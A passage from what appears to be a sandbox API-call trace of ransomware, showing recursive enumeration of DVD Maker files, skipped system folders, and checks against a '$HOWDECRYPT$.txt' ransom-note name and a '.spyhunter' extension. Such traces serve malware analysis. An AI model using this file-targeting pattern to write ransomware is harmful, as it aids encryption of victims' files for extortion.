lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0092.108] lstrcmpiW (lpString1="SecretST.TTF", lpString2="Windows") returned -1 [0092.108] lstrlenW (lpString="Windows") returned 7 [0092.108] lstrcmpiW (lpString1="SecretST.TTF", lpString2="$Recycle.bin") returned 1 [0092.108] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.108] lstrcmpiW (lpString1="SecretST.TTF", lpString2="System Volume Information") returned -1 [0092.108] lstrlenW (lpString="System Volume Information") returned 25 [0092.108] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\SecretST.TTF") returned 43 [0092.108] StrStrIW (lpFirst="SecretST.TTF", lpSrch=".spyhunter") returned 0x0 [0092.108] lstrcmpW (lpString1="SecretST.TTF", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.109] lstrcmpW (lpString1="SecretST.TTF", lpString2="_uninstalling_.png") returned 1 [0092.109] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\SecretST.TTF") returned 43 [0092.109] GetProcessHeap () returned 0x2c0000 [0092.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x98) returned 0x3514a8 [0092.109] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x16a0) returned 0x2c310e0 [0092.109] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0092.109] lstrcmpiW (lpString1="Shared", lpString2="Windows") returned -1 [0092.109] lstrlenW (lpString="Windows") returned 7 [0092.109] lstrcmpiW (lpString1="Shared", lpString2="$Recycle.bin") returned 1 [0092.109] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.109] lstrcmpiW (lpString1="Shared", lpString2="System Volume Information") returned -1 [0092.109] lstrlenW (lpString="System Volume Information") returned 25 [0092.109] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared") returned 37 [0092.109] lstrcmpW (lpString1="Shared", lpString2=".") returned 1 [0092.109] lstrcmpW (lpString1="Shared", lpString2="..") returned 1 [0092.109] GetProcessHeap () returned 0x2c0000 [0092.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0092.109] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*") returned 39 [0092.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335f20 [0092.159] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.159] lstrlenW (lpString="Windows") returned 7 [0092.159] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.159] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.159] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.159] lstrlenW (lpString="System Volume Information") returned 25 [0092.159] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\.") returned 39 [0092.159] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.159] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0092.159] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.160] lstrlenW (lpString="Windows") returned 7 [0092.160] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.160] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.160] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.160] lstrlenW (lpString="System Volume Information") returned 25 [0092.160] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\..") returned 40 [0092.160] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.160] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.160] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0092.160] lstrcmpiW (lpString1="Common.fxh", lpString2="Windows") returned -1 [0092.160] lstrlenW (lpString="Windows") returned 7 [0092.160] lstrcmpiW (lpString1="Common.fxh", lpString2="$Recycle.bin") returned 1 [0092.160] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.160] lstrcmpiW (lpString1="Common.fxh", lpString2="System Volume Information") returned -1 [0092.160] lstrlenW (lpString="System Volume Information") returned 25 [0092.160] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh") returned 48 [0092.160] StrStrIW (lpFirst="Common.fxh", lpSrch=".spyhunter") returned 0x0 [0092.160] lstrcmpW (lpString1="Common.fxh", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.160] lstrcmpW (lpString1="Common.fxh", lpString2="_uninstalling_.png") returned 1 [0092.160] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh") returned 48 [0092.160] GetProcessHeap () returned 0x2c0000 [0092.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa2) returned 0x33d000 [0092.160] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e0) returned 0x2c310e0 [0092.161] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0092.161] lstrcmpiW (lpString1="DissolveAnother.png", lpString2="Windows") returned -1 [0092.161] lstrlenW (lpString="Windows") returned 7 [0092.161] lstrcmpiW (lpString1="DissolveAnother.png", lpString2="$Recycle.bin") returned 1 [0092.161] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.161] lstrcmpiW (lpString1="DissolveAnother.png", lpString2="System Volume Information") returned -1 [0092.161] lstrlenW (lpString="System Volume Information") returned 25 [0092.161] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 57 [0092.161] StrStrIW (lpFirst="DissolveAnother.png", lpSrch=".spyhunter") returned 0x0 [0092.161] lstrcmpW (lpString1="DissolveAnother.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.161] lstrcmpW (lpString1="DissolveAnother.png", lpString2="_uninstalling_.png") returned 1 [0092.161] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 57 [0092.161] GetProcessHeap () returned 0x2c0000 [0092.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb4) returned 0x34cd58 [0092.161] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e8) returned 0x2c310e0 [0092.161] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0092.161] lstrcmpiW (lpString1="DissolveNoise.png", lpString2="Windows") returned -1 [0092.161] lstrlenW (lpString="Windows") returned 7 [0092.161] lstrcmpiW (lpString1="DissolveNoise.png", lpString2="$Recycle.bin") returned 1 [0092.161] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.161] lstrcmpiW (lpString1="DissolveNoise.png", lpString2="System Volume Information") returned -1 [0092.161] lstrlenW (lpString="System Volume Information") returned 25 [0092.161] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 55 [0092.161] StrStrIW (lpFirst="DissolveNoise.png", lpSrch=".spyhunter") returned 0x0 [0092.162] lstrcmpW (lpString1="DissolveNoise.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.162] lstrcmpW (lpString1="DissolveNoise.png", lpString2="_uninstalling_.png") returned 1 [0092.162] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 55 [0092.162] GetProcessHeap () returned 0x2c0000 [0092.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb0) returned 0x329f48 [0092.162] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f0) returned 0x2c310e0 [0092.162] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0092.162] lstrcmpiW (lpString1="DvdStyles", lpString2="Windows") returned -1 [0092.162] lstrlenW (lpString="Windows") returned 7 [0092.162] lstrcmpiW (lpString1="DvdStyles", lpString2="$Recycle.bin") returned 1 [0092.162] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.162] lstrcmpiW (lpString1="DvdStyles", lpString2="System Volume Information") returned -1 [0092.162] lstrlenW (lpString="System Volume Information") returned 25 [0092.162] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 47 [0092.162] lstrcmpW (lpString1="DvdStyles", lpString2=".") returned 1 [0092.162] lstrcmpW (lpString1="DvdStyles", lpString2="..") returned 1 [0092.162] GetProcessHeap () returned 0x2c0000 [0092.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0092.162] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*") returned 49 [0092.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0092.202] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.202] lstrlenW (lpString="Windows") returned 7 [0092.202] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.202] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.202] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.202] lstrlenW (lpString="System Volume Information") returned 25 [0092.202] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\.") returned 49 [0092.202] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.202] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.206] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.206] lstrlenW (lpString="Windows") returned 7 [0092.206] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.206] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.206] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.206] lstrlenW (lpString="System Volume Information") returned 25 [0092.206] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\..") returned 50 [0092.206] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.206] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.206] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.206] lstrcmpiW (lpString1="16to9Squareframe_Buttongraphic.png", lpString2="Windows") returned -1 [0092.206] lstrlenW (lpString="Windows") returned 7 [0092.206] lstrcmpiW (lpString1="16to9Squareframe_Buttongraphic.png", lpString2="$Recycle.bin") returned 1 [0092.206] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.206] lstrcmpiW (lpString1="16to9Squareframe_Buttongraphic.png", lpString2="System Volume Information") returned -1 [0092.206] lstrlenW (lpString="System Volume Information") returned 25 [0092.206] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 82 [0092.206] StrStrIW (lpFirst="16to9Squareframe_Buttongraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.206] lstrcmpW (lpString1="16to9Squareframe_Buttongraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.206] lstrcmpW (lpString1="16to9Squareframe_Buttongraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.206] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 82 [0092.207] GetProcessHeap () returned 0x2c0000 [0092.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34f508 [0092.207] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d8) returned 0x2c310e0 [0092.207] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.207] lstrcmpiW (lpString1="16to9Squareframe_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.207] lstrlenW (lpString="Windows") returned 7 [0092.207] lstrcmpiW (lpString1="16to9Squareframe_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.207] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.207] lstrcmpiW (lpString1="16to9Squareframe_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.207] lstrlenW (lpString="System Volume Information") returned 25 [0092.207] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 88 [0092.207] StrStrIW (lpFirst="16to9Squareframe_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.207] lstrcmpW (lpString1="16to9Squareframe_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.207] lstrcmpW (lpString1="16to9Squareframe_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.207] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 88 [0092.207] GetProcessHeap () returned 0x2c0000 [0092.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf2) returned 0x35a160 [0092.207] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e0) returned 0x2c310e0 [0092.207] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.207] lstrcmpiW (lpString1="16to9Squareframe_VideoInset.png", lpString2="Windows") returned -1 [0092.207] lstrlenW (lpString="Windows") returned 7 [0092.207] lstrcmpiW (lpString1="16to9Squareframe_VideoInset.png", lpString2="$Recycle.bin") returned 1 [0092.208] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.208] lstrcmpiW (lpString1="16to9Squareframe_VideoInset.png", lpString2="System Volume Information") returned -1 [0092.208] lstrlenW (lpString="System Volume Information") returned 25 [0092.208] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned 79 [0092.208] StrStrIW (lpFirst="16to9Squareframe_VideoInset.png", lpSrch=".spyhunter") returned 0x0 [0092.208] lstrcmpW (lpString1="16to9Squareframe_VideoInset.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.208] lstrcmpW (lpString1="16to9Squareframe_VideoInset.png", lpString2="_uninstalling_.png") returned 1 [0092.208] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned 79 [0092.208] GetProcessHeap () returned 0x2c0000 [0092.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x3780d8 [0092.208] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e8) returned 0x2c310e0 [0092.208] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.208] lstrcmpiW (lpString1="4to3Squareframe_Buttongraphic.png", lpString2="Windows") returned -1 [0092.208] lstrlenW (lpString="Windows") returned 7 [0092.208] lstrcmpiW (lpString1="4to3Squareframe_Buttongraphic.png", lpString2="$Recycle.bin") returned 1 [0092.208] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.208] lstrcmpiW (lpString1="4to3Squareframe_Buttongraphic.png", lpString2="System Volume Information") returned -1 [0092.208] lstrlenW (lpString="System Volume Information") returned 25 [0092.208] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png") returned 81 [0092.208] StrStrIW (lpFirst="4to3Squareframe_Buttongraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.208] lstrcmpW (lpString1="4to3Squareframe_Buttongraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.210] lstrcmpW (lpString1="4to3Squareframe_Buttongraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.210] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png") returned 81 [0092.210] GetProcessHeap () returned 0x2c0000 [0092.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f328 [0092.211] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f0) returned 0x2c310e0 [0092.211] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.211] lstrcmpiW (lpString1="4to3Squareframe_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.211] lstrlenW (lpString="Windows") returned 7 [0092.211] lstrcmpiW (lpString1="4to3Squareframe_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.211] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.211] lstrcmpiW (lpString1="4to3Squareframe_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.211] lstrlenW (lpString="System Volume Information") returned 25 [0092.211] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned 87 [0092.211] StrStrIW (lpFirst="4to3Squareframe_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.211] lstrcmpW (lpString1="4to3Squareframe_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.211] lstrcmpW (lpString1="4to3Squareframe_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.211] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned 87 [0092.211] GetProcessHeap () returned 0x2c0000 [0092.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf0) returned 0x3555a0 [0092.211] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f8) returned 0x2c310e0 [0092.211] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.211] lstrcmpiW (lpString1="4to3Squareframe_VideoInset.png", lpString2="Windows") returned -1 [0092.211] lstrlenW (lpString="Windows") returned 7 [0092.211] lstrcmpiW (lpString1="4to3Squareframe_VideoInset.png", lpString2="$Recycle.bin") returned 1 [0092.211] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.211] lstrcmpiW (lpString1="4to3Squareframe_VideoInset.png", lpString2="System Volume Information") returned -1 [0092.211] lstrlenW (lpString="System Volume Information") returned 25 [0092.212] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned 78 [0092.212] StrStrIW (lpFirst="4to3Squareframe_VideoInset.png", lpSrch=".spyhunter") returned 0x0 [0092.212] lstrcmpW (lpString1="4to3Squareframe_VideoInset.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.212] lstrcmpW (lpString1="4to3Squareframe_VideoInset.png", lpString2="_uninstalling_.png") returned 1 [0092.212] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned 78 [0092.212] GetProcessHeap () returned 0x2c0000 [0092.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x3781c0 [0092.212] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1600) returned 0x2c310e0 [0092.212] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.212] lstrcmpiW (lpString1="BabyBoy", lpString2="Windows") returned -1 [0092.212] lstrlenW (lpString="Windows") returned 7 [0092.212] lstrcmpiW (lpString1="BabyBoy", lpString2="$Recycle.bin") returned 1 [0092.212] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.212] lstrcmpiW (lpString1="BabyBoy", lpString2="System Volume Information") returned -1 [0092.212] lstrlenW (lpString="System Volume Information") returned 25 [0092.212] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 55 [0092.212] lstrcmpW (lpString1="BabyBoy", lpString2=".") returned 1 [0092.212] lstrcmpW (lpString1="BabyBoy", lpString2="..") returned 1 [0092.212] GetProcessHeap () returned 0x2c0000 [0092.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c13898 [0092.213] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\*") returned 57 [0092.213] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0092.238] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.243] lstrlenW (lpString="Windows") returned 7 [0092.243] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.243] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.243] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.243] lstrlenW (lpString="System Volume Information") returned 25 [0092.243] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\.") returned 57 [0092.243] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.243] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.243] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.243] lstrlenW (lpString="Windows") returned 7 [0092.243] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.243] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.244] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.244] lstrlenW (lpString="System Volume Information") returned 25 [0092.244] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\..") returned 58 [0092.244] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.244] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.244] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.244] lstrcmpiW (lpString1="babyblue.png", lpString2="Windows") returned -1 [0092.244] lstrlenW (lpString="Windows") returned 7 [0092.244] lstrcmpiW (lpString1="babyblue.png", lpString2="$Recycle.bin") returned 1 [0092.244] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.244] lstrcmpiW (lpString1="babyblue.png", lpString2="System Volume Information") returned -1 [0092.244] lstrlenW (lpString="System Volume Information") returned 25 [0092.244] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png") returned 68 [0092.244] StrStrIW (lpFirst="babyblue.png", lpSrch=".spyhunter") returned 0x0 [0092.244] lstrcmpW (lpString1="babyblue.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.244] lstrcmpW (lpString1="babyblue.png", lpString2="_uninstalling_.png") returned 1 [0092.244] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png") returned 68 [0092.244] GetProcessHeap () returned 0x2c0000 [0092.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x37e560 [0092.244] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1600) returned 0x2c310e0 [0092.244] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.244] lstrcmpiW (lpString1="BabyBoyMainBackground.wmv", lpString2="Windows") returned -1 [0092.244] lstrlenW (lpString="Windows") returned 7 [0092.244] lstrcmpiW (lpString1="BabyBoyMainBackground.wmv", lpString2="$Recycle.bin") returned 1 [0092.245] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.245] lstrcmpiW (lpString1="BabyBoyMainBackground.wmv", lpString2="System Volume Information") returned -1 [0092.245] lstrlenW (lpString="System Volume Information") returned 25 [0092.245] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 81 [0092.245] StrStrIW (lpFirst="BabyBoyMainBackground.wmv", lpSrch=".spyhunter") returned 0x0 [0092.245] lstrcmpW (lpString1="BabyBoyMainBackground.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.245] lstrcmpW (lpString1="BabyBoyMainBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0092.245] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 81 [0092.245] GetProcessHeap () returned 0x2c0000 [0092.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f058 [0092.245] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1608) returned 0x2c310e0 [0092.245] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.245] lstrcmpiW (lpString1="BabyBoyMainBackground_PAL.wmv", lpString2="Windows") returned -1 [0092.245] lstrlenW (lpString="Windows") returned 7 [0092.245] lstrcmpiW (lpString1="BabyBoyMainBackground_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.245] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.245] lstrcmpiW (lpString1="BabyBoyMainBackground_PAL.wmv", lpString2="System Volume Information") returned -1 [0092.245] lstrlenW (lpString="System Volume Information") returned 25 [0092.245] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 85 [0092.245] StrStrIW (lpFirst="BabyBoyMainBackground_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.245] lstrcmpW (lpString1="BabyBoyMainBackground_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.245] lstrcmpW (lpString1="BabyBoyMainBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.245] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 85 [0092.246] GetProcessHeap () returned 0x2c0000 [0092.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x355698 [0092.246] 